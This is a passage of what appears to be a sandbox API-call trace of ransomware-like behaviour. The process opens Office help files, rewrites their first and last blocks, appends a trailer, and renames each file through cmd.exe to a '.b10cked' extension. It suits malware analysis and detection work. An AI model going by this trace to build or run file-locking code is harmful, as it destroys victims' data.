lpStartupInfo=0x12ecec*(cb=0x0, lpReserved=0x0, lpDesktop=0x0, lpTitle=0x0, dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x1, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x12ecdc | out: lpCommandLine="\"C:\\Windows\\system32\\cmd.exe\" /C move /Y \"C:\\Users\\ALLUSE~1\\MICROS~2\\MSOUTL~1.HXN\" \"C:\\Users\\ALLUSE~1\\MICROS~2\\MS.OUTLOOK.14.1033.hxn.b10cked\"", lpProcessInformation=0x12ecdc*(hProcess=0x1b4, hThread=0x120, dwProcessId=0xe20, dwThreadId=0xeac)) returned 1 [0198.662] CloseHandle (hObject=0x1b4) returned 1 [0198.662] CloseHandle (hObject=0x120) returned 1 [0198.662] CharUpperBuffW (in: lpsz="C:\\Users\\All Users\\Microsoft Help\\", cchLength=0x22 | out: lpsz="C:\\USERS\\ALL USERS\\MICROSOFT HELP\\") returned 0x22 [0198.662] CharUpperBuffW (in: lpsz="C:\\Users\\All Users\\Microsoft Help\\", cchLength=0x22 | out: lpsz="C:\\USERS\\ALL USERS\\MICROSOFT HELP\\") returned 0x22 [0198.662] CompareStringW (Locale=0x400, dwCmpFlags=0x0, lpString1="C:\\USERS\\ALL USERS\\MICROSOFT HELP\\", cchCount1=34, 
lpString2="C:\\USERS\\ALL USERS\\MICROSOFT HELP\\", cchCount2=34) returned 2 [0198.662] WaitForSingleObject (hHandle=0xf8, dwMilliseconds=0xffffffff) returned 0x0 [0198.662] ReleaseMutex (hMutex=0xf8) returned 1 [0198.662] WaitForSingleObject (hHandle=0xf8, dwMilliseconds=0xffffffff) returned 0x0 [0198.662] ReleaseMutex (hMutex=0xf8) returned 1 [0198.662] WaitForSingleObject (hHandle=0xf8, dwMilliseconds=0xffffffff) returned 0x0 [0198.663] ReleaseMutex (hMutex=0xf8) returned 1 [0198.663] WaitForSingleObject (hHandle=0xf8, dwMilliseconds=0xffffffff) returned 0x0 [0198.663] ReleaseMutex (hMutex=0xf8) returned 1 [0198.663] CreateFileW (lpFileName="C:\\Users\\All Users\\Microsoft Help\\MS.OUTLOOK.DEV.14.1033.hxn" (normalized: "c:\\users\\all users\\microsoft help\\ms.outlook.dev.14.1033.hxn"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x120 [0198.663] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0198.663] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x16a [0198.663] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0198.663] QueryPerformanceCounter (in: lpPerformanceCount=0x12ed38 | out: lpPerformanceCount=0x12ed38*=25545222994) returned 1 [0198.663] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0198.663] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x16a [0198.663] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, 
lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0198.663] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0198.663] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x16a [0198.663] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0198.663] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ecf8*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ecf8*=0) returned 0x0 [0198.663] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ecf8*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ecf8*=0) returned 0x16a [0198.663] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ecf8*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ecf8*=0) returned 0x0 [0198.663] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0198.663] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x16a [0198.664] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0198.664] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0198.664] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x16a [0198.664] SetFilePointer (in: 
hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0198.664] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0198.664] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x16a [0198.664] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0198.664] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0198.664] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x16a [0198.664] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0198.664] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0198.664] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x16a [0198.664] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0198.664] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0198.664] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x16a 
[0198.664] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0198.664] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec60*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ec60*=0) returned 0x0 [0198.664] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec60*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ec60*=0) returned 0x16a [0198.664] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec60*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ec60*=0) returned 0x0 [0198.664] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec4c*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ec4c*=0) returned 0x0 [0198.664] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec58*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ec58*=0) returned 0x0 [0198.664] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec58*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ec58*=0) returned 0x16a [0198.665] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec58*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ec58*=0) returned 0x0 [0198.665] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec78*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ec78*=0) returned 0x0 [0198.665] ReadFile (in: hFile=0x120, lpBuffer=0x1300e58, nNumberOfBytesToRead=0xb4, lpNumberOfBytesRead=0x12ec08, lpOverlapped=0x0 | out: lpBuffer=0x1300e58*, lpNumberOfBytesRead=0x12ec08*=0xb4, lpOverlapped=0x0) returned 1 [0198.666] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec78*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ec78*=0) returned 0x0 [0198.666] WriteFile (in: hFile=0x120, lpBuffer=0x1300e58*, nNumberOfBytesToWrite=0xb4, 
lpNumberOfBytesWritten=0x12ec1c, lpOverlapped=0x0 | out: lpBuffer=0x1300e58*, lpNumberOfBytesWritten=0x12ec1c*=0xb4, lpOverlapped=0x0) returned 1 [0198.666] SetFilePointer (in: hFile=0x120, lDistanceToMove=-180, lpDistanceToMoveHigh=0x12ec78*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ec78*=0) returned 0xb6 [0198.666] ReadFile (in: hFile=0x120, lpBuffer=0x1300e58, nNumberOfBytesToRead=0xb4, lpNumberOfBytesRead=0x12ec08, lpOverlapped=0x0 | out: lpBuffer=0x1300e58*, lpNumberOfBytesRead=0x12ec08*=0xb4, lpOverlapped=0x0) returned 1 [0198.666] SetFilePointer (in: hFile=0x120, lDistanceToMove=-180, lpDistanceToMoveHigh=0x12ec78*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ec78*=0) returned 0xb6 [0198.666] WriteFile (in: hFile=0x120, lpBuffer=0x1300e58*, nNumberOfBytesToWrite=0xb4, lpNumberOfBytesWritten=0x12ec1c, lpOverlapped=0x0 | out: lpBuffer=0x1300e58*, lpNumberOfBytesWritten=0x12ec1c*=0xb4, lpOverlapped=0x0) returned 1 [0198.670] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="MS.OUTLOOK.DEV.14.1033.hxn", cchWideChar=26, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 26 [0198.670] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="MS.OUTLOOK.DEV.14.1033.hxn", cchWideChar=26, lpMultiByteStr=0x132f75c, cbMultiByte=26, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="MS.OUTLOOK.DEV.14.1033.hxn", lpUsedDefaultChar=0x0) returned 26 [0198.670] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ece0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ece0*=0) returned 0x16a [0198.670] WriteFile (in: hFile=0x120, lpBuffer=0x12f27c*, nNumberOfBytesToWrite=0x4e8, lpNumberOfBytesWritten=0x12ed20, lpOverlapped=0x0 | out: lpBuffer=0x12f27c*, lpNumberOfBytesWritten=0x12ed20*=0x4e8, lpOverlapped=0x0) returned 1 [0198.670] CloseHandle (hObject=0x120) returned 1 [0198.681] GetShortPathNameW (in: 
lpszLongPath="C:\\Users\\All Users\\Microsoft Help\\MS.OUTLOOK.DEV.14.1033.hxn", lpszShortPath=0x1273a8c, cchBuffer=0x103 | out: lpszShortPath="C:\\Users\\ALLUSE~1\\MICROS~2\\MSOUTL~2.HXN") returned 0x27 [0198.681] GetShortPathNameW (in: lpszLongPath="C:\\Users\\All Users\\Microsoft Help\\", lpszShortPath=0x1273a8c, cchBuffer=0x103 | out: lpszShortPath="C:\\Users\\ALLUSE~1\\MICROS~2\\") returned 0x1b [0198.683] CreateProcessW (in: lpApplicationName=0x0, lpCommandLine="\"C:\\Windows\\system32\\cmd.exe\" /C move /Y \"C:\\Users\\ALLUSE~1\\MICROS~2\\MSOUTL~2.HXN\" \"C:\\Users\\ALLUSE~1\\MICROS~2\\MS.OUTLOOK.DEV.14.1033.hxn.b10cked\"", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=0, dwCreationFlags=0x30, lpEnvironment=0x0, lpCurrentDirectory=0x0, lpStartupInfo=0x12ecec*(cb=0x0, lpReserved=0x0, lpDesktop=0x0, lpTitle=0x0, dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x1, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x12ecdc | out: lpCommandLine="\"C:\\Windows\\system32\\cmd.exe\" /C move /Y \"C:\\Users\\ALLUSE~1\\MICROS~2\\MSOUTL~2.HXN\" \"C:\\Users\\ALLUSE~1\\MICROS~2\\MS.OUTLOOK.DEV.14.1033.hxn.b10cked\"", lpProcessInformation=0x12ecdc*(hProcess=0x1b4, hThread=0x120, dwProcessId=0xf50, dwThreadId=0xe4c)) returned 1 [0198.688] CloseHandle (hObject=0x1b4) returned 1 [0198.688] CloseHandle (hObject=0x120) returned 1 [0198.688] CharUpperBuffW (in: lpsz="C:\\Users\\All Users\\Microsoft Help\\", cchLength=0x22 | out: lpsz="C:\\USERS\\ALL USERS\\MICROSOFT HELP\\") returned 0x22 [0198.688] CharUpperBuffW (in: lpsz="C:\\Users\\All Users\\Microsoft Help\\", cchLength=0x22 | out: lpsz="C:\\USERS\\ALL USERS\\MICROSOFT HELP\\") returned 0x22 [0198.688] CompareStringW (Locale=0x400, dwCmpFlags=0x0, lpString1="C:\\USERS\\ALL USERS\\MICROSOFT HELP\\", cchCount1=34, lpString2="C:\\USERS\\ALL USERS\\MICROSOFT HELP\\", 
cchCount2=34) returned 2 [0198.688] WaitForSingleObject (hHandle=0xf8, dwMilliseconds=0xffffffff) returned 0x0 [0198.688] ReleaseMutex (hMutex=0xf8) returned 1 [0198.688] WaitForSingleObject (hHandle=0xf8, dwMilliseconds=0xffffffff) returned 0x0 [0198.688] ReleaseMutex (hMutex=0xf8) returned 1 [0198.688] WaitForSingleObject (hHandle=0xf8, dwMilliseconds=0xffffffff) returned 0x0 [0198.688] ReleaseMutex (hMutex=0xf8) returned 1 [0198.688] WaitForSingleObject (hHandle=0xf8, dwMilliseconds=0xffffffff) returned 0x0 [0198.688] ReleaseMutex (hMutex=0xf8) returned 1 [0198.688] CreateFileW (lpFileName="C:\\Users\\All Users\\Microsoft Help\\MS.POWERPNT.14.1033.hxn" (normalized: "c:\\users\\all users\\microsoft help\\ms.powerpnt.14.1033.hxn"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x120 [0198.741] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0198.741] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x158 [0198.741] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0198.741] QueryPerformanceCounter (in: lpPerformanceCount=0x12ed38 | out: lpPerformanceCount=0x12ed38*=25553033669) returned 1 [0198.741] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0198.741] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x158 [0198.741] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: 
lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0198.741] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0198.741] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x158 [0198.741] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0198.741] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ecf8*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ecf8*=0) returned 0x0 [0198.741] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ecf8*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ecf8*=0) returned 0x158 [0198.742] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ecf8*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ecf8*=0) returned 0x0 [0198.742] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0198.742] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x158 [0198.742] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0198.742] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0198.742] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x158 [0198.742] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, 
dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0198.742] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0198.742] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x158 [0198.742] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0198.742] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0198.742] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x158 [0198.742] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0198.742] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0198.742] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x158 [0198.742] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0198.742] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0198.742] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x158 [0198.742] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, 
lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0198.742] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec60*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ec60*=0) returned 0x0 [0198.742] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec60*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ec60*=0) returned 0x158 [0198.742] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec60*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ec60*=0) returned 0x0 [0198.743] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec4c*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ec4c*=0) returned 0x0 [0198.743] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec58*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ec58*=0) returned 0x0 [0198.743] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec58*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ec58*=0) returned 0x158 [0198.743] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec58*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ec58*=0) returned 0x0 [0198.743] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec78*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ec78*=0) returned 0x0 [0198.743] ReadFile (in: hFile=0x120, lpBuffer=0x1300e58, nNumberOfBytesToRead=0xab, lpNumberOfBytesRead=0x12ec08, lpOverlapped=0x0 | out: lpBuffer=0x1300e58*, lpNumberOfBytesRead=0x12ec08*=0xab, lpOverlapped=0x0) returned 1 [0198.744] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec78*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ec78*=0) returned 0x0 [0198.744] WriteFile (in: hFile=0x120, lpBuffer=0x1300e58*, nNumberOfBytesToWrite=0xab, lpNumberOfBytesWritten=0x12ec1c, lpOverlapped=0x0 | out: 
lpBuffer=0x1300e58*, lpNumberOfBytesWritten=0x12ec1c*=0xab, lpOverlapped=0x0) returned 1 [0198.744] SetFilePointer (in: hFile=0x120, lDistanceToMove=-171, lpDistanceToMoveHigh=0x12ec78*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ec78*=0) returned 0xad [0198.744] ReadFile (in: hFile=0x120, lpBuffer=0x1300e58, nNumberOfBytesToRead=0xab, lpNumberOfBytesRead=0x12ec08, lpOverlapped=0x0 | out: lpBuffer=0x1300e58*, lpNumberOfBytesRead=0x12ec08*=0xab, lpOverlapped=0x0) returned 1 [0198.744] SetFilePointer (in: hFile=0x120, lDistanceToMove=-171, lpDistanceToMoveHigh=0x12ec78*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ec78*=0) returned 0xad [0198.744] WriteFile (in: hFile=0x120, lpBuffer=0x1300e58*, nNumberOfBytesToWrite=0xab, lpNumberOfBytesWritten=0x12ec1c, lpOverlapped=0x0 | out: lpBuffer=0x1300e58*, lpNumberOfBytesWritten=0x12ec1c*=0xab, lpOverlapped=0x0) returned 1 [0198.748] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="MS.POWERPNT.14.1033.hxn", cchWideChar=23, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 23 [0198.748] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="MS.POWERPNT.14.1033.hxn", cchWideChar=23, lpMultiByteStr=0x1328794, cbMultiByte=23, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="MS.POWERPNT.14.1033.hxn", lpUsedDefaultChar=0x0) returned 23 [0198.748] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ece0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ece0*=0) returned 0x158 [0198.748] WriteFile (in: hFile=0x120, lpBuffer=0x12f27c*, nNumberOfBytesToWrite=0x4e8, lpNumberOfBytesWritten=0x12ed20, lpOverlapped=0x0 | out: lpBuffer=0x12f27c*, lpNumberOfBytesWritten=0x12ed20*=0x4e8, lpOverlapped=0x0) returned 1 [0198.748] CloseHandle (hObject=0x120) returned 1 [0198.749] GetShortPathNameW (in: lpszLongPath="C:\\Users\\All Users\\Microsoft 
